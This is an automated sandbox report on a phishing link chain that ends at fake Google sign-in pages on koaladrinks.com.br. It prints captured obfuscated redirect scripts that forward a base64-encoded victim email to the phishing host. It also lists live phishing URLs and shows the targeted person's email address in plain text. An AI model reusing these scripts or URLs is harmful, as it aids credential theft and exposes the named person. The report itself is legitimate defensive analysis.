Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t

Overview

General Information

Sample URL:https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t
Analysis ID:1587369
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected suspicious Javascript
Detected hidden input values containing email addresses (often used in phishing pages)
HTML body contains password input but no form action
HTML page contains string obfuscation
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 6284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1904,i,2393401072678527284,7300859850790636309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://i.koaladrinks.com.br/XZoMKBqJ#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tJoe Sandbox AI: Score: 9 Reasons: The brand 'Google Drive' is well-known and typically associated with the domain 'drive.google.com'., The URL 'i.koaladrinks.com.br' does not match the legitimate domain for Google Drive., The domain 'koaladrinks.com.br' does not have any known association with Google or Google Drive., The use of a subdomain 'i' and an unrelated primary domain 'koaladrinks.com.br' is suspicious and indicative of phishing., There are no known legitimate associations between 'koaladrinks.com.br' and Google Drive services. DOM: 2.1.pages.csv
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tJoe Sandbox AI: Score: 9 Reasons: The brand 'Google' is classified as 'wellknown'., The URL 'ijgbload.koaladrinks.com.br' does not match the legitimate domain 'google.com'., The domain 'koaladrinks.com.br' is unrelated to Google, which is suspicious., The presence of a subdomain 'ijgbload' and unrelated main domain suggests potential phishing., The input fields 'Email or phone' are commonly targeted in phishing attempts. DOM: 3.2.pages.csv
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tJoe Sandbox AI: Score: 9 Reasons: The brand 'Google' is well-known and typically associated with the domain 'google.com'., The URL 'ijgbload.koaladrinks.com.br' does not match the legitimate domain for Google., The domain 'koaladrinks.com.br' is unrelated to Google, which is suspicious., The presence of a subdomain 'ijgbload' and the unrelated main domain suggest a potential phishing attempt., The use of email or phone input fields is common in phishing sites attempting to harvest credentials. DOM: 3.5.pages.csv
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1Joe Sandbox AI: Score: 9 Reasons: The brand 'Google' is classified as 'wellknown'., The URL 'ijgbload.koaladrinks.com.br' does not match the legitimate domain 'google.com'., The domain 'koaladrinks.com.br' is unrelated to Google, which is suspicious., The presence of 'Enter your password' input field on an unrelated domain is a common phishing tactic., The subdomain 'ijgbload' and the main domain 'koaladrinks.com.br' do not have any known association with Google. DOM: 4.10.pages.csv
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cliks.serviceonesystem.org/?_kx=8HbiTT4lit... This script demonstrates several high-risk behaviors, including the use of obfuscated URLs and redirects to an untrusted domain. The combination of these factors suggests a potentially malicious intent, likely for the purpose of phishing or other nefarious activities.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://i.koaladrinks.com.br/XZoMKBqJ#YWxhaW5femll... This script exhibits several high-risk behaviors, including dynamic code execution through string manipulation, data exfiltration by redirecting to an untrusted domain, and the use of obfuscated URLs. The combination of these factors indicates a high likelihood of malicious intent, potentially for phishing or other malicious activities.
Source: 0.36.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://ijgbload.koaladrinks.com.br/v3/signin/iden... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the overall suspicious nature of the script's activities indicate a high likelihood of malicious intent.
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: alain_ziegler@zieglergroup.com
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://i.koaladrinks.com.br/XZoMKBqJ#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: Found new string: script . document.addEventListener('DOMContentLoaded', function() {. var uri = "'h' + 't' + 'tp' + 's:' + '/' + '/' + 'i.' + 'k' + 'oa' + 'la' + 'dri' + 'n' + 'k' + 's' + '.' + 'com' + '.br' + '/XZ' + 'oM' + 'KBq' + 'J?' + 'e=' + 'Ix' + 'i' + 'R3J' + '4'";. uri = uri.replace(/'/g, "");. ..uri = uri.replace(/\+/g, "");. ..uri = uri.replace(/\s/g, "");. const submitButton = document.querySelector('input[type=submit]');. submitButton.addEventListener('click', function() {. const currentUrl = window.location.href;. const url = new URL(currentUrl);. const params = url.search; // Get the URL parameters. const hash = url.hash; // Get the hash. const redirectUrl = `${uri}${params}${hash}`;. // Redirect to the new URL. window.location.replace(redirectUrl); // This will prevent going back. });. });. ..
Source: https://cliks.serviceonesystem.org/?_kx=8HbiTT4litESi4AjCoiaOA.V3Xdb4#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: Found new string: script .function handleHashRedirect() {. const url = 'ht' + 't' + 'p' + 's:' + '//' + 'i' + '.' + 'koaladrinks' + '.' + 'com' + '.' + 'br' + '/' + 'X' + 'Z' + 'o' + 'M' + 'K' + 'B' + 'q' + 'J';. const currentHash = window.location.hash;. if (currentHash) {. const hashValue = currentHash.substring(1);. const redirectURL = `${url}#${hashValue}`;. window.location.href = redirectURL;. }.}.window.onload = handleHashRedirect;...
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: Title: Sign in - Google Accounts does not match URL
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Title: Sign in - Google Accounts does not match URL
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: Iframe src: https://yt-sub.koaladrinks.com.br/accounts/CheckConnection?pmpo=https%3A%2F%2Fijgbload.koaladrinks.com.br&v=1920793691&timestamp=1736497668863
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: Iframe src: /_/bscframe
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Iframe src: https://yt-sub.koaladrinks.com.br/accounts/CheckConnection?pmpo=https%3A%2F%2Fijgbload.koaladrinks.com.br&v=1920793691&timestamp=1736497668863
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Iframe src: /_/bscframe
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Iframe src: https://yt-sub.koaladrinks.com.br/accounts/CheckConnection?pmpo=https%3A%2F%2Fijgbload.koaladrinks.com.br&v=1920793691&timestamp=1736497668863
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Iframe src: /_/bscframe
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Iframe src: https://yt-sub.koaladrinks.com.br/accounts/CheckConnection?pmpo=https%3A%2F%2Fijgbload.koaladrinks.com.br&v=1920793691&timestamp=1736497668863
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: Iframe src: /_/bscframe
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: <input type="password" .../> found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: <input type="password" .../> found
Source: https://cliks.serviceonesystem.org/?_kx=8HbiTT4litESi4AjCoiaOA.V3Xdb4#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No favicon
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No favicon
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No favicon
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No favicon
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No favicon
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No favicon
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No <meta name="author".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No <meta name="author".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No <meta name="author".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No <meta name="author".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No <meta name="author".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No <meta name="copyright".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/identifier?flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&dsh=S1847760580%3A1736497656249061&ddm=1#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tHTTP Parser: No <meta name="copyright".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No <meta name="copyright".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No <meta name="copyright".. found
Source: https://ijgbload.koaladrinks.com.br/v3/signin/challenge/pwd?TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&checkConnection&checkedDomains=youtube&cid=1&ddm=1&dsh=S1847760580%3A1736497656249061&flowEntry=ServiceLogin&flowName=GlifWebSignIn&hl=en&ifkv=AVdkyDlGhnItroLAC3si_mqULQOt4JsDQW8FBnibx9rAmyc2QgdpVgDNlU-QpphCVCgezxOaVMxZ&pstMsg=1HTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: global trafficHTTP traffic detected: GET /?_kx=8HbiTT4litESi4AjCoiaOA.V3Xdb4 HTTP/1.1Host: cliks.serviceonesystem.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/blocks/navigation/style.min.css?ver=6.7.1 HTTP/1.1Host: serviceonesystem.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://cliks.serviceonesystem.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/script-modules/block-library/navigation/view.min.js?ver=8ff192874fc8910a284c HTTP/1.1Host: serviceonesystem.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://cliks.serviceonesystem.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cliks.serviceonesystem.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
